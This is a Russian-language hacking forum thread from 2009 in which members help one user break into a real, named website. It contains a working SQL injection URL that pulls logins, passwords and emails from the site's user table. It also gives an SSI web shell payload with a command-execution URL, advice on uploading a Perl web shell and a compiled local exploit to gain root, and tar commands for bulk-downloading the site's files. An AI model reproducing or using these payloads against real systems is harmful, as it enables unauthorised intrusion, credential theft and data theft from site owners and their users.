
23.04.2009, 21:06
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от Byrger
Ух... все стандартные префиксы+колонки пробрутил...300мб ушло...
Может есть другие способы?
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F, _login,_pass,_mail),6,7,8+from+cms_users--+
Сообщение от VITАL
http://downloadportal.ru/10388-advanced-sql-injection-tricks-detali.html
А копирайты поставить ?
Последний раз редактировалось ElteRUS; 23.04.2009 в 21:11..
|
|
|

23.04.2009, 21:12
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от ElteRUS
http://transsib-express.ru/index.php?id=344&nid=-198+union+select+1,2,3,4,concat_ws(0x2F, _login,_pass,_mail),6,7,8+from+cms_users--+
Лови ++
А тогда такой вопрос...
Есть шелл
Но на сервере не нашёл компилятора gcc в каталогах /sbin/ и /bin/ как быть?
Выполняя команду gcc Exploit.c -o Exploit ничего не происходит...
И как можно слить все файлы каталога с сайтом сразу?
Safe-mode: ON
Архивировать по средствам c99 не удаётся...
может возможно какойнить дампер на PHP залить туда? Если не сложно то какой
Последний раз редактировалось Byrger; 23.04.2009 в 22:19..
|
|
|

24.04.2009, 02:25
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
Byrger
если ты выполняешь
gcc Exploit.c -o Exploit из веб-шелла и у тебя ничего не происходит, то ответ ты написал ниже
Safe-mode: ON
Тебе нужен полноценный шелл, ну или хотя бы веб-шелл с нормальными правами
Пробуй залить перловый шелл, например r57pws.pl
Ищи в гугле
|
|
|

24.04.2009, 03:13
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
если подключен mod_include, попробуй использовать SSI, создай файл с расширением shtml, например shell.shtml с таким содержанием:
Код:
<!--#exec cmd="$QUERY_STRING_UNESCAPED"-->
, и пользуй его, например
Код:
http://transsib-express.ru/path/shell.shtml?ls -lp
__________________
Карфаген должен быть разрушен...
|
|
|

24.04.2009, 05:36
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Нет это вовершенно 2 разных гелла!
Пытаюсь слить кантент с Safe-mode: ON
И зарутить с Safe-mode: OFF
|
|
|

24.04.2009, 05:37
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
2 Byrger
скомпиль на какой-нибудь другой тачке сплоит, да и загрузи его
|
|
|

24.04.2009, 05:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
__________________
Карфаген должен быть разрушен...
|
|
|

24.04.2009, 11:09
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от Scipio
2Byrger
попробуй:
http://site.ru/path/shell.shtml?ltar -cvzf ./dump.tgz /path/to/dir/kotoruyu/slivat
а первое как сказал Iceangel_
Не получается заархивировать...может потому что файлы которые архивирую с правами на чтение?
Права сменить не могу = ( они стают (1234)
|
|
|

24.04.2009, 11:18
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.
может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
|
|
|

24.04.2009, 11:31
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от $n@ke
права на чтение - это как раз то что надо. а вообще, посмотри по ls -lia
и если в каждой тройке будет r - значит можешь спокойно архивить.
может быть у тебя нехватает прав на ту диру,куда ты указал положить архив?
Ничего не выдаёт может из-за Safe-mode: ON
Сохраняю в дирку с правами 777
любой фаил пытаюсь c99 архивировать пишет...
Can't call archivator (tar cfzv archive_9f27c.tar.gz -v0x2z.jpg)!
Конешно можно по 1 файлу выкачивать но это не дело...там их более 5к
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|